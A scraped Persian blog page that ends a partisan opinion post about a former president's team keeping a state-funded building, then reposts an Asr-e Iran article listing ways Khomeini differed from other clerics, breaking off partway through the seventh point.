مسئولیت، تیم همراه، ممكن است كه در حلقه اول، همزمان تعداد .... نفر باشند، لذا به یك ساختمان بزرگ، جنب محل اقامت نیاز داشته اند. همین ساختمان را ، ان زمان ، از إمكانات و اعتبار نهاد ر.ج&nbsp; استفاده كرده و برای رفاه بیشتر نیروها، در اختیار تیم حفاظتی قرار داده بوده اند. بعد از مسلولیت، دیگر بلحاظ تغییر ماهوی و صوری فرایند حفاظتی، مساله، سالبه به انتفای موضوع بوده، لذا به ان حجم از إمكانات و تأسیسات ، نیازی نبوده است، بنابراین ، ان ساختمان نیز مورد استفاده دیگری قرار میگرفته. امّاٰ، تا كنون، چهار سال است كه، كماكان ان هزینه و ان ساختمان ، از سوی نهاد ر.ج ، در اختیار تیم ر.ج سابق قرار دارد، و أحیاناً از ان بعنوان مقر امورات شخصی ( مانند دفتر مراجعات مردمی ر. ج سابق...) استفاده میشود، و ، البته شاید دیگر برادران نیز از ان جهت استراحت، بهره میبٌردند. <br>اینك بعد از چهار سال، نهاد ر.ج از تامین ان هزینه و ان ساختمان، استنكاف كرده است،. امری كه قاعدتاً همان چهار سال قبل میتوانست انجام شود، و چهار سال، تاخیر شده!<br>در حالیكه این مساله، هیچ ربطی به مساله حفاظت ان شخص ندارد، امّاٰ، ایشان و دوستان موضوع را "تراژیك" كرده و عامّه ناس را در ان دخیل نموده اند. <br>در ادبیات سیاسی كلاسیك، این عمل، نام خاصی دارد كه بنده مایل به ذكر ان نیستم چون، در فارسی، ترجمه مناسبی نشده است،... ، بگذریم. <br>امّاٰ، ویكتورهوگو در رساله ای&nbsp; "نقش شارلاتانیزم"&nbsp; در تسخیر أفكار عمومی را، شرح مبسوطی داده كه به این بحث ما، مربوط نمیشود. <br>امّاٰ، در مقابل، ذكر خاطره از یك واقعه مشابه، شاید در تبیین موضوع، موثر باشد؛ <br><br>دوازده سال پیش، روزهای اول كار دولت منتخب، در مرداد&nbsp; ٨٤ بود. یكروز صبح زود، یكنفر از دوستان صاحب منصب، كه ان زمان هنوز معاون اقای روحانی (و نیز مشاور اقای هاشمی) بودند، تماس گرفتند، و به كوه پیمایی دعوت كردند. <br>در مسیر، ضمن گفتگو، حس كردم ایشان از مساله ای ناراحت و متاثر است. علت را با حفظ حدود، جویا شدم. ایشان گفت، ؛ دیروز (چند روز پس از تحلیف ر.ج نٌهم)، نزد اقای هاشمی بودم، ناگهان مسئولان خدمات امدند و عذر خواهی كردند، گفتند كه از اداره أموال نهاد ر.ج امده اند، و یك لیست دارند از أموالی كه در دفتر اقای هاشمی است، (كاخ مرمر، مجمع تشخیص)، و اینها میگویند كه اقای ا.ن گفته كه این أموال متعلق به نهاد ر.ج است و مال بیت المال ، لذا باید بازگردد، و استفاده شما از اینها ، خلاف شرع است!؟؟!!،<br>جالب اینكه، فرش زیر پای اقای هاشمی هم جزء ان أموال بود!..<br>اقای هاشمی را بلند كردند، فرش زیر پایش را جمع كردند و بردند...<br>ایشان گفت، من خیلی ناراحت شدم، و از دفتر اقای هاشمی رفتم بیرون و رفتم مركز تحقیقات نیاوران، دفتر اقای روحانی، ، رفتم تا با ایشان درد دل كنم،<br>میگفت، وقتی رسیدم، دیدم انجا هم اوضاع غیر عادی و كمی بهم ریخته است،،<br>رفتم نزد شیخ ، دیدم كه ایشان هم خیلی عصبانی است، تا امدم داستان فرش اطاق اقای هاشمی را بازگو كنم، ایشان گفت، ؛ صبح امده اند منزل، و ماشین&nbsp; "بی ام و" من را كه به نهاد هم ربطی نداشته، از تیم حفاظت گرفته و برده اند، و گفته اند، این بیت المال هست و خلاف شرع... <br>بالاخره با ماشین دیگری امدیم مركز تحقیقات، دیدم امده اند فرش زیر پای من را هم جمع كرده اند و برده اند، . گفته اند اینها مال بیت المال است و استفاده شخصی!! خلاف شرع است..<br>این ها فقط یك نمونه بودند،،. <br>حالا همین "حافظان بیت المال" ، كه از قرار باید پاسخگوی میلیاردها وجوه ارزی و ریالی "درامد و هزینه" زمان مسئولیت خویش باشند، و هنوز ساختمانهایی درجه یك از نهاد را با تمام تجهیزات ان، در اختیار خود&nbsp; دارند، و خدا میداند كه میزان مسئولیت ایشان در قبال سرمایه های ملّی، از زمان مسئولیت شان تا كنون، چقدر بوده است،..،&nbsp; یك ساختمان غیر ضروری را كه سَر كوچه أقای "برادر ا.ن" بنام نهاد خریده بوده اند و هزینه های جاری انرا هم از نهاد میگیرند، بعد از چهار سال از ایشان پس گرفته اند، ببینید چه شالتاقی&nbsp; در اورده اند..<br><br>من بیش از هر چیز برای اندسته از ادم های ساده ای متاسفم كه با نهایت خلوص، از این شانتاژگران عوام نواز،&nbsp; و اعمال مٌلك بر باد ده انها، دفاع میكنند ، و چه دفاع متعصبانه و قابل تاسّفی! <br>البته، انصافاً كه طرح "جمع اوری اعانه ملّی"، عجب ایده موثر و حیات بخشی است!!</font></span></font></p></div><br>&nbsp;&nbsp; <strong> <b> <font size="5" face="Latha"> <span style="text-decoration: overline; background-color: #FFFFCC"> <b style="color: rgb(68, 68, 68); font-family: Tahoma; font-style: normal; font-variant: normal; line-height: 56px; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(183, 152, 105)"> <span style="font-weight: 700; background-color: #F2F2F2"><font face="Arial" color="#0000FF">تهیه وَ تدوین: عـبـــد عـا صـی&nbsp; </font></span></b></span></font></b></strong><br><br><br> <b></b> <font style="font-size:8pt;"> </font> </div> text/html 2017-06-04T15:03:00+01:00 1001SHAYADOBAYAD.mihanblog.com عـبـــد عـا صـی دَه تفاوت او با دیگران http://1001SHAYADOBAYAD.mihanblog.com/post/3505 <div class="xpost2"> <div dir="RTL" style="line-height: 200%; margin: 0" align="right"> <b> <div class="xpost2" style="color: rgb(68, 68, 68); padding-left: 23px; padding-right: 25px; padding-top: 0px; padding-bottom: 8px; background-color: rgb(242, 255, 255)"> <div class="xpost2" style="color: rgb(68, 68, 68); padding-left: 23px; padding-right: 25px; padding-top: 0px; padding-bottom: 8px; background-color: rgb(242, 255, 255)"> <div class="xpost2"> <div class="xpost2" style="color: rgb(68, 68, 68); font-family: Tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; padding-left: 23px; padding-right: 25px; padding-top: 0px; padding-bottom: 8px; background-color: rgb(242, 255, 255)"> <div style="text-align: right" dir="rtl"> <b style="color: rgb(68, 68, 68); font-family: Tahoma; font-size: 12px; font-style: normal; font-variant: normal; letter-spacing: 3px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(183, 152, 105)"> <strong> <div class="xpost2"> <div class="xpost2" style="color: rgb(68, 68, 68); font-family: Tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; padding-left: 23px; padding-right: 25px; padding-top: 0px; padding-bottom: 8px; background-color: rgb(242, 255, 255)"> <p dir="rtl" style="line-height: 36px; margin-top: 0px; margin-bottom: 0px" align="justify"> &nbsp;</p> <p dir="rtl" style="line-height: 36px; margin-top: 0px; margin-bottom: 0px" align="justify"> <span style="color: #FFFFFF; font-family: Microsoft Sans Serif; font-size: large; font-weight: 700; background-color: #00B700"> &nbsp; بسم الله الرحمن الرحیم &nbsp;</span></p><p dir="rtl" style="line-height: 36px; margin-top: 0px; margin-bottom: 0px" align="justify"> &nbsp;</p></div> </div> </strong></b> </div> </div> </div> </div> </div> </b> </div> <strong> <b style="color: rgb(68, 68, 68); font-family: Arial; font-style: normal; font-variant: normal; letter-spacing: 3px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(183, 152, 105)"> </b> </strong><div dir="RTL" style="line-height: 200%; margin: 0" align="right"><strong> <b style="font-size: 12px; font-style: normal; font-variant: normal ; letter-spacing: normal; line-height: normal; orphans: auto; text-align :justify; text-indent: 0px; text-transform: none; white-space: normal ; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #F2F2F2; text-decoration:overline blink; vertical-align:bottom"> <font size="5" face="Microsoft Sans Serif" color="#0033CC"> <h1 style="margin: 0px; padding: 0px" class="title"> <a href="http://www.asriran.com/fa/news/542360/%C3%98%C2%AE%C3%99%C2%85%C3%9B%C2%8C%C3%99%C2%86%C3%9B%C2%8C-%C3%9A%C2%86%C3%9A%C2%AF%C3%99%C2%88%C3%99%C2%86%C3%99%C2%87-%C3%98%C2%AE%C3%99%C2%85%C3%9B%C2%8C%C3%99%C2%86%C3%9B%C2%8C-%C3%98%C2%B4%C3%98%C2%AF-10-%C3%98%C2%AA%C3%99%C2%85%C3%98%C2%A7%C3%9B%C2%8C%C3%98%C2%B2-%C3%9B%C2%8C%C3%98%C2%A7-%C3%98%C2%AA%C3%99%C2%81%C3%98%C2%A7%C3%99%C2%88%C3%98%C2%AA-%C3%98%C2%A7%C3%99%C2%85%C3%98%C2%A7%C3%99%C2%85-%C3%98%C2%A8%C3%98%C2%A7-%C3%98%C2%AF%C3%9B%C2%8C%C3%9A%C2%AF%C3%98%C2%B1%C3%98%C2%A7%C3%99%C2%86" target="_blank"> <font size="7" color="#00B700">&nbsp; دَه تفاوت او با دیگران </font></a> </h1> </font></b> <p style="line-height: 70px; margin-top: 0; margin-bottom: 0"> &nbsp;</p> <p style="line-height: 70px; margin-top: 0; margin-bottom: 0"> <b> <b style="color: rgb(68, 68, 68); font-family: Tahoma; font-size: 12px; font-style: normal; font-variant: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(183, 152, 105)"> <b style="color: rgb(42, 32, 17); font-size: 12px; line-height: normal; background-color: rgb(183, 152, 105)"> <span style="background-color: rgb(255, 255, 0)"> <font size="5" face="Arial" color="#0000ff">&nbsp;&nbsp;<span lang="fa">جهت مراجعه به&nbsp;</span></font></span></b><span lang="fa"><b style="color: rgb(42, 32, 17); font-size: 12px; line-height: normal; background-color: #E3FFFF"><font size="5" face="Arial" color="#0033cc">مرجع متن</font></b><b style="color: rgb(42, 32, 17); font-size: 12px; line-height: normal; background-color: rgb(183, 152, 105)"><span style="background-color: rgb(255, 255, 0)"><font size="5" face="Arial" color="#0000ff">، یا&nbsp;</font></span></b><b style="color: rgb(42, 32, 17); font-size: 12px; line-height: normal; background-color: #E3FFFF"><font size="5" face="Arial" color="#0033cc">عنوان اصلی</font></b><span style="background-color: rgb(255, 255, 0)"><font size="5" face="Arial" color="#0000ff"><b style="line-height: normal; ">، به پیوند فوق اشاره</b></font></span></span><span style="background-color: rgb(255, 255, 0)"><font size="5" face="Arial" color="#0000ff"><b style="line-height: normal; "> کنید <span lang="fa">&nbsp;</span></b></font></span></b></b></p><b><b style="color: rgb(68, 68, 68); font-family: Tahoma; font-size: 12px; font-style: normal; font-variant: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(183, 152, 105)"><font size="5" face="Microsoft Sans Serif" color="#0033CC"> </font> </b> </b></strong><div dir="RTL" style="line-height: 200%; margin: 0" align="justify"><strong><b> <font face="Microsoft Sans Serif" color="#0033CC"> <b style="font-style: normal; font-variant: normal ; letter-spacing: normal; line-height: normal; orphans: auto; text-align :justify; text-indent: 0px; text-transform: none; white-space: normal ; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; "> </b></font><div class="body" style="text-align: justify; padding: 10px"><font face="Microsoft Sans Serif" color="#0033CC"><b style="font-style: normal; font-variant: normal ; letter-spacing: normal; line-height: normal; orphans: auto; text-align :justify; text-indent: 0px; text-transform: none; white-space: normal ; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; "> </b></font><div align="justify"><font face="Microsoft Sans Serif" color="#0033CC"><b style="font-style: normal; font-variant: normal ; letter-spacing: normal; line-height: normal; orphans: auto; text-align :justify; text-indent: 0px; text-transform: none; white-space: normal ; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; "> <span style="color: rgb(0, 0, 205); background-color: #FFFFCC">&nbsp;عصر ایران؛ مهرداد خدیر</span></b></font><b style="font-style: normal; font-variant: normal ; letter-spacing: normal; line-height: normal; orphans: auto; text-align :justify; text-indent: 0px; text-transform: none; white-space: normal ; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #E3FFFF"><font face="Microsoft Sans Serif" color="#0033CC">: این یک گفتار «متفاوت» است چون می خواهد به <span style="font-weight: bold">«تفاوت»</span> های امام خمینی – اگر نخواهیم بگوییم « تمایز» های او – با روحانیون دیگر بپردازد.<br> تأکید بر تفاوت ها و تمایزها به معنی انکارِ خاستگاه و تعلق اصلی نیست. کما این که وقتی می گوییم «حافظ» با شاعران دیگر متفاوت بود «شاعر» بودن او به مثابه یک اصل بدیهی پذیرفته شده است. ایضا هنگامی که از تفاوت پیامبر گرامی اسلام با دیگر پیامبران سخن گفته می شود به منزله آن است که اشتراکات پذیرفته شده و مثال های دیگر.<br> <span style="font-weight: bold">«آیت الله حاج آقا روح الله»</span> یک مرجع تقلید بود و تا قبل از آن که عنوان «امام» عام و همه گیر شود همچون دیگر مراجع با عنوان «آیت الله العظمی» از او یاد می شد. شگفتا که در دی ماه 1356 در نوشته ای موهن این لقب یا عنوان را نیاوردند و تنها 9 ماه بعد ناگزیر شدند تمام نیم صفحه اول روزنامه های کیهان و اطلاعات را به این کلمات اختصاص دهند: آیت الله العظمی خمینی ...<br> با این حال تفاوت های آشکاری در او مشهود بود که اگر نبود «خمینی» نمی شد.<br> <span style="font-weight: bold">مراد از تفاوت ها یا تمایزها در این نوشته نه صفات اخلاقی و ویژگی های شخصیتی امام است و نه کارنامه دهه اول جمهوری اسلامی را برمی رسد بلکه از منظر تاریخی و واقعا تفاوت هایی مد نظر است که در نگاه مراجع و روحانیون دیگر یا نبود یا کمتر دیده می شد:</span><br> &nbsp;</font></b></div><b style="font-style: normal; font-variant: normal ; letter-spacing: normal; line-height: normal; orphans: auto; text-align :justify; text-indent: 0px; text-transform: none; white-space: normal ; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #E3FFFF"><font face="Microsoft Sans Serif" color="#0033CC"> </font></b> <font face="Microsoft Sans Serif" color="#0033CC"> <b style="font-style: normal; font-variant: normal ; letter-spacing: normal; line-height: normal; orphans: auto; text-align :justify; text-indent: 0px; text-transform: none; white-space: normal ; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #E3FFFF"> </b><p><b style="font-style: normal; font-variant: normal ; letter-spacing: normal; line-height: normal; orphans: auto; text-align :justify; text-indent: 0px; text-transform: none; white-space: normal ; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #E3FFFF"> <img src="http://cdn.asriran.com/files/fa/news/1396/3/14/706694_141.jpeg" title="خمینی، چگونه خمینی شد؟ / 10 تمایز یا تفاوت امام با دیگران" alt="خمینی، چگونه خمینی شد؟ / 10 تمایز یا تفاوت امام با دیگران" style="border: 0px none" class="img-responsive" vspace="10" align="right" hspace="10" height="410" width="618"><br> </b> <b style="font-style: normal; font-variant: normal ; letter-spacing: normal; line-height: normal; orphans: auto; text-align :justify; text-indent: 0px; text-transform: none; white-space: normal ; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #FFFF00"> <span style="font-weight: bold; color: rgb(0, 0, 205)">ابن عربی</span><br> </b> <b style="font-style: normal; font-variant: normal ; letter-spacing: normal; line-height: normal; orphans: auto; text-align :justify; text-indent: 0px; text-transform: none; white-space: normal ; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #E3FFFF"> <span style="font-weight: bold; color: rgb(0, 0, 205)">1-</span>آیت الله خمینی فقیه و مجتهد بود اما یک تفاوت بزرگ با دیگر فقهای معاصر یا ماقبل خود داشت و آن علاقه به «<span style="font-weight: bold">محی الدین عربی</span>» بود و عرفان را از منظر او پی می گرفت. این در حالی است که ابن عربی از نظر شماری از فقها به کفر هم متهم شده بود. <br> &nbsp; </b> <b style="font-style: normal; font-variant: normal ; letter-spacing: normal; line-height: normal; orphans: auto; text-align :justify; text-indent: 0px; text-transform: none; white-space: normal ; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; "> <span style="font-weight: bold; background-color: #FFFF00">سید جلال الدین آشتیانی</span></b><b style="font-style: normal; font-variant: normal ; letter-spacing: normal; line-height: normal; orphans: auto; text-align :justify; text-indent: 0px; text-transform: none; white-space: normal ; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #E3FFFF"> در انتهای مقدمه خود بر کتاب « مصباح الهدایه» می نویسد: « نکته مهم در آثار عرفانی امام این است که بیش از همه به بزرگانی چون ابن عربی و ملاصدرا و دیگران که از نظر اهل ظاهر کافر محسوب می شدند و کسی جرأت ذکر نام آنها را نداشت عقاید و اندیشه های آنان را پذیرفته بود و نقل می کرد.»-[ زیبا پرستی در عرفان اسلامی- ص 487]<br> آیت الله <span style="font-weight: bold">صابری همدانی</span> نیز می گوید: « ایشان در تدریس از دو شخصیت بسیار تعریف می کرد. یکی مرحوم <span style="font-weight: bold">شاه آبادی</span> بود که تعبیر شیخناالاستاد را درباره او به کار می بردند و دیگری محی الدین عربی که کلمه <span style="font-weight: bold">امام العارفین</span> یا کلمه دیگری را برای او می آوردند و همین باعث شد از ذهنیت اولیه دست بکشیم و به این عارف، حُسنِ ظنّ داشته باشیم.»-[ حریم امام، شماره 269، ص 31]<br> برخی البته می گویند این مربوط به سال های جوانی امام است. اما جالب است بدانیم در واپسین ماه های زندگی و در پیام مشهور به آخرین رهبر اتحاد شوروی نیز از محی الدین ابن عربی یاد می کنند.<br> صریح و روشن این که کم نبودند و نیستند روحانیون بلند مرتبه ای که ابن عربی و کل عرفان را قبول ندارند اما آیت الله خمینی از جوانی تا واپسین دم حیات در زمره ستایندگان ابن عربی بود.<br> </b> <b style="font-style: normal; font-variant: normal ; letter-spacing: normal; line-height: normal; orphans: auto; text-align :justify; text-indent: 0px; text-transform: none; white-space: normal ; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; "> <span style="font-weight: bold; color: rgb(0, 0, 205); background-color: #FFFF00"> جمهوریت</span></b><b style="font-style: normal; font-variant: normal ; letter-spacing: normal; line-height: normal; orphans: auto; text-align :justify; text-indent: 0px; text-transform: none; white-space: normal ; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #E3FFFF"><br> <span style="font-weight: bold; color: rgb(0, 0, 205)">2-</span> واژه « جمهوری» نزد کثیری از مراجع یا روحانیون، تابو بود. مخالفت <span style="font-weight: bold">سید حسن مدرس</span> با جمهوریت نه فقط به خاطر رضاخان که با اصل ایده جمهوریت هم بود.<br> امام خمینی البته «جمهوری اسلامی» را مطرح کرد تا هم با «جمهوری» متفاوت باشد و هم با «حکومت اسلامی» اما «جمهوری اسلامی» هم چنان که در<span style="font-weight: bold"> نوفل لو شاتو</span> گفته شد باز نوعی «جمهوری» است و حتی امام به عنوان فرم و ظرف جمهوری فرانسه را مثال می آورد.<br> در تاریخ ایران و قبل از طرح و موفقیت «جمهوری اسلامی» 4 بار موضوع جمهوری به میان آمده و هر 4 به دلیل مخالفت های آشکار روحانیت یا عوامل دیگر ناکام مانده است:<br> بار اول « جمهوری گیلان» که هم از برخی ایده های <span style="font-weight: bold">میرزا کوچک خان</span> قابل مشاهده بود و هم از کودتای <span style="font-weight: bold">احسان الله خان</span> و <span style="font-weight: bold">خالو قربان</span> علیه او وجنبش جنگل.<br> نوبت دوم همان که <span style="font-weight: bold">رضاخان</span> در پی آن بود و می خواست مانند <span style="font-weight: bold">مصطفی کمال پاشا</span> که در ترکیه جمهوری تأسیس کرد با بر انداختن سلطنت چنین کند و مخالفت های فراوان و متنوعی را در برابر دید.<br> بار سوم در شهریور 1320 که رضا شاه باید ایران را ترک می کرد و صحبت از انقراض سلطنت پهلوی بود و ابتدا قرار بود محمد رضا هم با پدر و برادران همراه شود اما <span style="font-weight: bold">محمد علی فروغی</span> اعلام جمهوری ولو با ریاست جمهوری خود را نپذیرفت و پروژه یا سناریوی سلطنت ولیعهد را به جای پدرو برادرانی که راهی تبعید می شدند با موفقیت به اجرا گذاشت.<br> نوبت چهارم هم در روزهای پر التهاب مرداد 1332 که حزب توده از یک طرف و <span style="font-weight: bold">دکتر حسین فاطمی</span> از سوی دیگر زمان را برای تأسیس جمهوری مناسب می دانستند و <span style="font-weight: bold">دکتر مصدق</span> مخالفت کرد و گفت: « من، قُرآن مُهر کرده ام که به قانون اساسی مشروطه وفادار باشم.»<br> امام خمینی اما با طرح ایده « جمهوری اسلامی» تفاوت خود را هم با آنان نشان داد و هم روحانیون سنتی که می پنداشتند مدل جمهوری با قواعد اسلامی جور در نمی آید.<br> </b> <b style="font-style: normal; font-variant: normal ; letter-spacing: normal; line-height: normal; orphans: auto; text-align :justify; text-indent: 0px; text-transform: none; white-space: normal ; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; "> <span style="font-weight: bold; color: rgb(0, 0, 205); background-color: #FFFF00"> کاشانی و مصدق</span></b><b style="font-style: normal; font-variant: normal ; letter-spacing: normal; line-height: normal; orphans: auto; text-align :justify; text-indent: 0px; text-transform: none; white-space: normal ; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #E3FFFF"><br> <span style="font-weight: bold; color: rgb(0, 0, 205)">3-</span> این واقعیت را نمی توان انکار کرد که اگر امام می خواست در 50 سالگی و در نهضت ملی شدن صنعت نفت و در جریان اختلاف رهبران جانب یکی را بگیرد قطعا <span style="font-weight: bold">سید ابوالقاسم کاشانی</span> را ترجیح می داد چندان که در سال 60 و در نطق هایی علیه جبهه ملی و <span style="font-weight: bold">بنی صدر</span> از کاشانی یاد می کند. <br> اما در سال های آغازین دهه 30 با این که از 50 سالگی عبور کرده و خود نیز اهل سیاست بود نمی خواست ذیل کاشانی تعریف شود و به همین خاطر در سال های مبارزه و تبعید از 42 تا 57 و خصوصا در سال 57 مصدقی ها تعارضی در همکاری نمی دیدند که اگر چنین بود مرد شماره 2 انقلاب – آیت الله <span style="font-weight: bold">طالقانی</span>- نبود که از علاقه مندان مصدق بود و اولین نخست وزیر کسی نبود که خود را با سه واژه « ایرانی، مسلمان و مصدقی» معرفی می کرد و اولین رییس جمهوری ایران نیز کسی نبود که از اعضای پیشین جبهه ملی و علاقه مند و مبلّغ مصدق در خارج از کشور به حساب می آمد یا نباید دبیر کل جبهه ملی و وزیر فرهنگ دکتر مصدق و همراه او در دیوان داوری لاهه اولین وزیر خارجه جمهوری اسلامی می شد ( دکتر <span style="font-weight: bold">کریم سنجابی</span>).<br> </b> <b style="font-style: normal; font-variant: normal ; letter-spacing: normal; line-height: normal; orphans: auto; text-align :justify; text-indent: 0px; text-transform: none; white-space: normal ; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; "> <span style="font-weight: bold; color: rgb(0, 0, 205); background-color: #FFFF00"> علی شریعتی</span></b><b style="font-style: normal; font-variant: normal ; letter-spacing: normal; line-height: normal; orphans: auto; text-align :justify; text-indent: 0px; text-transform: none; white-space: normal ; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #E3FFFF"><br> <span style="font-weight: bold; color: rgb(0, 0, 205)">4-</span> در سال هایی که برخی روحانیون و گاه در حد مراجع آشکارا به دکتر <span style="font-weight: bold">علی شریعتی</span> می تاختند و در حالی که&nbsp; <span style="font-weight: bold">مرتضی مطهری</span> هم به صف منتقدین پیوسته بود امام خمینی یک کلمه در نفی و نقد شریعتی نگفت. در تأیید هم البته نگفت اما هرگز مانند بسیاری از روحانیون دیگر علیه شریعتی موضع نگرفت. <br> چرا که نمی خواست در صف مبارزه اختلاف افتد و از سوی دیگر در میان خانواده و نزدیکان خود از برادر عروس – <span style="font-weight: bold"> صادق طباطبایی</span>- تا&nbsp; <span style="font-weight: bold">صادق قطب زاده و ابراهیم یزدی</span> همه از دوستان علی شریعتی بودند و می دانست که مهم ترین روحانیون داخلی علاقه مند به ایشان در نوع نگاه به شریعتی با سنتی ها تفاوت دارند.<br> &nbsp;در میان روحانیون مبارز و نسبتا جوان داخلی بیش از همه <span style="font-weight: bold">آیت الله بهشتی و آیت الله خامنه ای</span> به شریعتی علاقه و در واقع گرایش داشتند و امام تفاوت خود را با روحانیون سنتی در اینجا هم نشان داد. <br> برخی می گویند پس از درگذشت دکتر شریعتی و در پاسخ به تلگراف تسلیت دکتر یزدی و در قالب پیام به دانشجویان امام از لفظ «فقد» و نه «شهادت» برای دکتر استفاده می کند در حالی که واژه « فوت» را نیز به کار نمی برد و قضیه را مبهم باقی می گذارد و برای فرزند خود – سید مصطفی- نیز لفظ شهادت را به کار نمی برد زیرا نمی خواسته با ضرس قاطع داوری کند.<br> </b> <b style="font-style: normal; font-variant: normal ; letter-spacing: normal; line-height: normal; orphans: auto; text-align :justify; text-indent: 0px; text-transform: none; white-space: normal ; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #FFFF00"> <span style="font-weight: bold; color: rgb(0, 0, 205)">ملاصدرا و فلسفه</span><br> </b> <b style="font-style: normal; font-variant: normal ; letter-spacing: normal; line-height: normal; orphans: auto; text-align :justify; text-indent: 0px; text-transform: none; white-space: normal ; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #E3FFFF"> <span style="font-weight: bold; color: rgb(0, 0, 205)">5-</span> غالب روحانیون با فلسفه میانه ای ندارند. چندان که به عرفان. امام اما اهل فلسفه بود همچون عرفان و دیدیم که تفسیر او از قرآن را حتی در نخستین سال جمهوری اسلامی تاب نیاوردند. مهم ترین شاگردان و دست پروردگان امام همچون مرتضی مطهری اما اهل فلسفه بودند و همین نیز او را متفاوت و متمایز جلوه می داد.<br> &nbsp;در همان پیام به گورباچوف در کنار نام ابن عربی از <span style="font-weight: bold">صدرالمتالهین</span> نیز یاد می کند و از <span style="font-weight: bold">گورباچوف</span> می خواهد اندیشمندان خود را به مطالعه آرای او ترغیب کند و وقتی <span style="font-weight: bold">ادوارد شوارد نادزه</span> پیام رهبر شوروی را به تهران می آورد و امام احساس می کند برخورد سیاسی دارند و روح پیام را انگار درک نکرده اند به وزیر خارجه وقت شوروی می گوید: «من می خواستم دریچه تازه ای به روی شما بگشایم» و دیدار را کوتاه می کند. <br> این دریچه تازه را امام با اندیشه های ابن عربی و ملاصدرا گشاده و گشوده می دید.<br> </b> <b style="font-style: normal; font-variant: normal ; letter-spacing: normal; line-height: normal; orphans: auto; text-align :justify; text-indent: 0px; text-transform: none; white-space: normal ; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #FFFF00"> <span style="font-weight: bold; color: rgb(0, 0, 205)">مدرس و پارلمان</span><br> </b> <b style="font-style: normal; font-variant: normal ; letter-spacing: normal; line-height: normal; orphans: auto; text-align :justify; text-indent: 0px; text-transform: none; white-space: normal ; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #E3FFFF"> <span style="font-weight: bold; color: rgb(0, 0, 205)">6</span>- نقل شده که آیت الله خمینی در جوانی به تهران می آمده و در ساختمان مجلس شورای ملی نظاره گر مباحثات و گفتار و رفتار شخص <span style="font-weight: bold">سید حسن مدرس</span> بوده است. یادمان باشد مدرس بیش از آن که فقیه سنتی باشد سیاست مدار بود و هر چند در مجلس اول مشروطه نقش نظارتی را پذیرفت اما از مجلس دوم به بعد و تا وقتی استبداد رضاشاهی مجال داد ترجیح داد با رأی مردم نماینده و وکیل باشد و اعتبار خود را تنها از فقه و دین نگیرد.<br> امام هم مدرس را الگو قرار داد و آن قدر که از زبان رهبر فقید انقلاب در ستایش مدرس شنیده ایم هیچ مرجع و روحانی ارشد دیگری چنین یاد نکرده است.<br> در نطق 12 بهمن 57 هم امام وقتی می خواهد به تشکیل دولت اشاره کند می گوید: « من به واسطه این که ملت مرا قبول دارد دولت تعیین می کنم.»یعنی همچون مدرس به این که مردم هم باید قبول داشته باشند اعتقاد داشته است.<br> توجه به پارلمان و جمله مشهور « مجلس، در رأس امور است» نیز به احتمال زیاد به خاطر شخصیت پارلمانی مدرس بود.&nbsp; همان مدرس که بر خلاف <span style="font-weight: bold">شیخ فضل الله نوری</span> به مشروطه باور داشت و آن را «مشئومه» نمی دانست.<br> </b> <b style="font-style: normal; font-variant: normal ; letter-spacing: normal; line-height: normal; orphans: auto; text-align :justify; text-indent: 0px; text-transform: none; white-space: normal ; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #FFFF00"> <span style="font-weight: bold; color: rgb(0, 0, 205)">نفی سلطنت</span><br> </b> <b style="font-style: normal; font-variant: normal ; letter-spacing: normal; line-height: normal; orphans: auto; text-align :justify; text-indent: 0px; text-transform: none; white-space: normal ; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #E3FFFF"> <span style="font-weight: bold; color: rgb(0, 0, 205)">7-</span> در تاریخ ایران سابقه نداشت که یک مرجع تقلید به نفی کل سلطنت برسد و مهم تر این که سلطنت را به سبب « تعارض موروثی بودن با حقوق بشر و حق تعیین سرنوشت برای هر ملت و هر نسل» نفی 